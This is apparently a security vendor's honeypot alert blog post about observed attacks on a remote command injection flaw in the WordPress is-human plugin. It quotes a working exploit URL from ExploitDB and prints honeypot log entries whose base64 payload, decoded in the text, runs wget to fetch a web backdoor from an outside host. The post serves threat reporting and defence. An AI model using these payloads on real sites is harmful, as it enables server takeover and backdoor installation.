LevelBlue

LevelBlue + SentinelOne Partner to Deliver AI-Powered Managed Security Operations and Incident Response. Learn More

Submit RFP Request a Demo

[Honeypot Alert] More WordPress is_human Plugin Remote Command Injection Attack Detected

Change theme to light
1 Minute Read by Ryan Barnett

As we first noted in a previous Honeypot Alert Blog post, our web honeypots have again received attempts to exploit a WordPress is-human pluging remote command injection vulnerability. ExploitDB lists the following data:

# Exploit Title: is-human (1.4.2 and prior) Worpdress plugin.
# Date: 16.05.2011
# Author: neworder [www.neworder-ind.net]
# Software Link: http://wordpress.org/extend/plugins/is-human/
# Version: 1.4.2
# Tested on: Linux Platform
The vulnerability exists in /is-human/engine.php .
It is possible to take control of the eval() function via the 'type' parameter, when the 'action' is set to log-reset. From here we can run out own code.
In order to avoid any errors we point the $is_hum->get_* array variable into $is_hum->get_ih and to close the execution without error we point it to php stored function error_log(). In between we may place our own php code and use the passthru() function to execute commands.
Execution running the linux whoami command:
http://server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(whoami);error

Here are the attacks we picked up:

178.137.167.112 - - [12/Mar/2012:11:14:38 +0000] "GET /wordpress//wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3Ryb2xsLmhyMDAucnUvc2gudHh0OyBtdiBzaC50eHQgc2gucGhwJyk7));error HTTP/1.1" 404 568 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
178.137.167.112 - - [12/Mar/2012:11:14:38 +0000] "GET /wordpress//wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3Ryb2xsLmhyMDAucnUvc2gudHh0OyBtdiBzaC50eHQgc2gucGhwJyk7));error HTTP/1.1" 404 568 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
178.137.167.112 - - [12/Mar/2012:11:14:42 +0000] "GET //wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3Ryb2xsLmhyMDAucnUvc2gudHh0OyBtdiBzaC50eHQgc2gucGhwJyk7));error HTTP/1.1" 301 765 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

As you can see, the attacker is injecting PHP eval and base64_decode calls into the vulnerable "type" parameter of the is_human WordPress plugin. The base64_decode call results in the following text:

passthru('wget http://troll.hr00.ru/sh.txt; mv sh.txt sh.php');

This attempts to access the OS level wget http client tool to download the "sh.txt" file on the remote site. Here is a snippet of the code:

 

When this code is executed by PHP, it results in a common web backdoor page such as the following screenshot which was taken from Google search results for other compromised hosts.


 


 

  Screen shot 2012-03-12 at 12.05.06 PM

ABOUT LEVELBLUE

LevelBlue secures what's next with intelligence-led security delivering visibility and speed to stop threats faster. As the world’s largest and most analyst-recognized pure-play managed security services provider, our AI-powered managed services and cyber expertise across managed, advisory, and incident response services help clients operate with confidence. Learn more about us.

https://www.levelblue.com/resources/blogs/internal-blog/how-to-create-a-blog-post/

Latest Intelligence

The Device Code Phishing Tsunami: What We’re Seeing in the Wild
macOS ClickFix Social Engineering Campaigns
ClickFix Is Now Hiring: From Job Platform Impersonation to Python-Based RAT Delivery

Discover how our specialists can tailor a security program to fit the needs of
your organization.

Request a Demo

Stay Informed

Sign up to receive the latest security news and trends straight to your inbox from LevelBlue.
© Copyright 2026